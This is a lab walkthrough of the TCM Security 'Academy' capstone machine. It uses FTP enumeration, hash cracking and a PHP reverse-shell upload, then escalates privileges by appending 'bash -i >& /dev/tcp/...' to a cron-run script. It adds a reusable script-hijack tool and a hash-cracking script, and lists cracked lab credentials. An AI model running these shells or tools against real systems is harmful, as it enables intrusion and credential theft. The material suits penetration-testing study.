Walkthrough: Academy Lab (PEH Capstone TCM Security)
Target IP: 192.168.1.108
Nmap Scan:
nmap -Pn -A -p- 192.168.1.108
(-Pn skips host discovery, -A enables version detection, default scripts, OS detection and traceroute, -p- scans all 65535 TCP ports.)
Enumeration:
FTP:
The nmap service-version and default-script scan (-sV -sC, both included in -A) reports that anonymous login is allowed and lists a file called note.txt on the FTP server. Log in anonymously and download the file.
note.txt contains some details about a database.
HTTP:
First things first: check robots.txt and sitemap.xml.
Neither exists; the 404 page only reveals the server banner, Apache/2.4.38.
Nmap version detection reports the same version, nothing more.
Next, brute-force directories with ffuf and gobuster (port 80 is plain HTTP, so use http://):
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.108/FUZZ
gobuster dir -u http://192.168.1.108 -w /usr/share/wordlists/dirb/big.txt
Findings:
21/tcp open ftp vsftpd 3.0.3 - anonymous FTP login allowed
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (SSH-2.0-OpenSSH_7.9p1)
80/tcp open http Apache httpd 2.4.38 (Debian)
Directories found on the web server: /academy, /phpmyadmin, /server-status
note.txt on the FTP server: mentions the user jdelta and contains database details
Exploitation:
FTP
note.txt also contains a hash. It is 32 hex characters, so it is most likely an unsalted MD5; crack it with hashcat in MD5 mode (-m 0) against rockyou:
cd73502828457d15655bbd7a63fb0bc8
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
The hash cracks to student. Together with the details in note.txt this gives a login for the academy application:
Student ID: 10201321
Password: student
HTTP
Log in to the /academy application with this student ID and password.
The application has an upload option. A PHP reverse shell can be uploaded here.
We use php-reverse-shell with the IP and port set to the attacker machine. Start a listener on the attacker machine first, then upload the file; when the server executes it, the listener receives a shell.
The shell runs as www-data, so we need to escalate privileges.
We use LinPEAS for privilege-escalation enumeration.
Download linpeas.sh on the attacker machine, serve it over a local web server, and fetch it from the target machine.
Give linpeas.sh execute permission and run it.
LinPEAS shows a user named grimmie who is in an administrator group.
It also flags a password in /var/www/html/academy/includes/config.php.
The file contains the database credentials mysql_username: grimmie, mysql_pass: My_V3ryS3cur3_P4ss.
Logging into the MySQL database with them fails at this point. Since users tend to reuse passwords, try the same password for grimmie over SSH instead.
The SSH login as grimmie succeeds. Looking around the home directory, there is a script called backup.sh.
It looks like some kind of scheduled task, but neither the crontabs we can read nor systemctl list-timers show where it is run from.
To find out, use pspy (pspy64), a Linux process-monitoring tool that watches /proc without needing root. Download it to the target and run it.
It shows every process that starts on the server.
We can see backup.sh being executed by /bin/bash at regular intervals.
Because the script is writable by grimmie and is run by a more privileged user, we can put a bash reverse shell into backup.sh so that the scheduled job executes it for us (the one-liner relies on bash's /dev/tcp, which is fine here because the job runs the script with /bin/bash):
bash -i >& /dev/tcp/192.168.1.103/4444 0>&1
Start a listener on port 4444 on the attacker machine and wait for the next run of the job; the listener receives a shell with the privileges of the user running backup.sh.
We got our flag.
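The script hijack above, as an added example that is not part of the original walkthrough. It parameterises the reverse-shell one-liner, checks that the target script is actually writable, keeps a copy of the original, and appends the payload rather than overwriting it, so the scheduled job still does its real work before our shell fires and the file can be restored afterwards. The script path, attacker IP and port are passed in; the demo runs against a throwaway copy constructed in a temporary directory, not the real /home/grimmie/backup.sh.

```shell
#!/bin/sh
# Added example (not from the walkthrough): hijack a script that a scheduled
# job runs as a more privileged user. Assumptions not on the page: the script
# path, attacker IP and port are passed in; the job runs the script with
# /bin/bash (needed for /dev/tcp); the script is writable by our current user.

# The reverse-shell one-liner used in the walkthrough, parameterised.
revshell_line() {
    printf 'bash -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2"
}

# Show the script's owner and mode so we know who the shell will come back
# as (a root-owned script writable by us is the misconfiguration exploited).
describe_target() {
    ls -l "$1"
}

# Append the payload instead of overwriting the script: the job keeps doing
# its work, which avoids breaking the host and drawing attention, and a copy
# of the original is kept so it can be restored. Prints the backup path.
inject_revshell() {
    script=$1 ip=$2 port=$3
    if [ ! -w "$script" ]; then
        echo "not writable by $(id -un): $script" >&2
        return 1
    fi
    backup="$script.orig.$$"
    cp -p "$script" "$backup" || return 1
    revshell_line "$ip" "$port" >> "$script"
    printf '%s\n' "$backup"
}

# Exit 0 if the payload for this IP/port is present in the script.
payload_present() {
    grep -qF "/dev/tcp/$2/$3" "$1"
}

# Put the original script back and drop the backup copy (clean-up step).
restore_script() {
    cp -p "$2" "$1" && rm -f "$2"
}

# Demo against a constructed throwaway copy (the real target was
# /home/grimmie/backup.sh on 192.168.1.108, listener on 192.168.1.103:4444).
demo() {
    d=$(mktemp -d)
    printf '#!/bin/bash\ntar czf /tmp/backup.tgz /var/www/html\n' > "$d/backup.sh"
    describe_target "$d/backup.sh"
    b=$(inject_revshell "$d/backup.sh" 192.168.1.103 4444)
    cat "$d/backup.sh"
    restore_script "$d/backup.sh" "$b"
    rm -rf "$d"
}
demo
```

Because the payload is appended, `bash -i` only starts after the job's own commands have finished, and it blocks the job until the reverse shell is closed; on the real target that means restoring the script and exiting the shell once you are done, or the job never completes again. If pspy had shown the script being run by `sh` rather than `bash`, the `/dev/tcp` redirection would not exist and a different payload (for example one using nc or python) would be needed.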
Others:
We also get access to the database as grimmie:
mysql -u grimmie -p        (password: My_V3ryS3cur3_P4ss)
show databases;            (the server is MySQL)
use mysql;
show tables;
select * from user;
This lists all the database users and their password hashes. The hashes start with * followed by 40 hex characters, which is the MySQL 4.1+ format (SHA1 of SHA1 of the password, hashcat mode 300).
After cracking the hashes (hashcat -m 300):
*8DEB44F79A130674A714BA1A66387EC111A82BD1 root:26021997
*03E2854B1BC2353C7FED1F780C55F7845322DC57 pma:pmapass
*FBAFF8215F65CDBF082236E749CD2D772DC921C7
Root's /etc/shadow entry (sha512crypt, hashcat -m 1800) cracks to tcm:
$6$ahtry9roVl5oY1fo$V87.ZOyfRA9cGeRawFky4jnS03RJeC6xqEYM5RmSzMABjzYtvAPiZtp0eRwdyj3qUoPhA2ZYD40h/nC6G0PnB.: tcm
With that password we can now SSH in directly as root:
ssh root@192.168.1.108
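An added example, not part of the original walkthrough, covering both the note.txt hash cracked earlier and the MySQL and /etc/shadow hashes above: it classifies a hash by its shape, maps it to the hashcat mode (-m) that cracks it, and brute-forces the unsalted MD5/SHA-1 ones from a wordlist using nothing but coreutils, which is the same work hashcat does at scale. The wordlist is a constructed stand-in for rockyou.txt; the sha512crypt and MySQL hashes are only classified, not cracked, since those need hashcat (or a salt-aware implementation).

```shell
#!/bin/sh
# Added example (not from the walkthrough): recognise the hash formats met in
# this lab, map each to its hashcat mode, and crack the unsalted ones from a
# wordlist with md5sum/sha1sum. The wordlist is a constructed stand-in for
# rockyou.txt.

# Classify a hash by its shape and print the hashcat mode that cracks it.
hash_type() {
    case $1 in
        '$6$'*) echo "sha512crypt (hashcat -m 1800)" ;;   # /etc/shadow entry
        '*'*)                                             # MySQL 4.1+: '*' + 40 hex
            if [ ${#1} -eq 41 ]; then
                echo "mysql41 (hashcat -m 300)"
            else
                echo "unknown"
            fi ;;
        *)
            case ${#1} in
                32) echo "md5 (hashcat -m 0)" ;;
                40) echo "sha1 (hashcat -m 100)" ;;
                *)  echo "unknown" ;;
            esac ;;
    esac
}

# Brute-force an unsalted MD5 or SHA-1 hash ($1) with a wordlist file ($2).
# Unsalted single-round hashes fall this easily, which is the whole lesson
# of the note.txt hash. Prints the plaintext and returns 0 on a hit, 1 on a
# miss, 2 for a hash length it does not handle. Case-insensitive on the hash.
crack_unsalted() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case ${#target} in
        32) tool=md5sum ;;
        40) tool=sha1sum ;;
        *)  echo "unsupported hash length ${#target}" >&2; return 2 ;;
    esac
    while IFS= read -r word || [ -n "$word" ]; do
        h=$(printf '%s' "$word" | "$tool" | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed mini wordlist (rockyou.txt in the real run); prints its path.
make_wordlist() {
    f=$(mktemp)
    printf 'password\n123456\ntcm\nstudent\nacademy\n' > "$f"
    printf '%s\n' "$f"
}

# Demo: classify the three kinds of hash seen in the lab, then crack the one
# from note.txt.
for h in cd73502828457d15655bbd7a63fb0bc8 \
         '*8DEB44F79A130674A714BA1A66387EC111A82BD1' \
         '$6$ahtry9roVl5oY1fo$V87.ZOyfRA9cGeRawFky4jnS03RJeC6xqEYM5RmSzMABjzYtvAPiZtp0eRwdyj3qUoPhA2ZYD40h/nC6G0PnB.'; do
    printf '%s -> %s\n' "$h" "$(hash_type "$h")"
done
wl=$(make_wordlist)
crack_unsalted cd73502828457d15655bbd7a63fb0bc8 "$wl"   # prints: student
rm -f "$wl"
```

The classification is by shape only (prefix and length), so it is a hint for picking the hashcat mode, not proof: a 32-hex-character string could also be NTLM or MD4, and hashcat will simply report no hits if the guess is wrong.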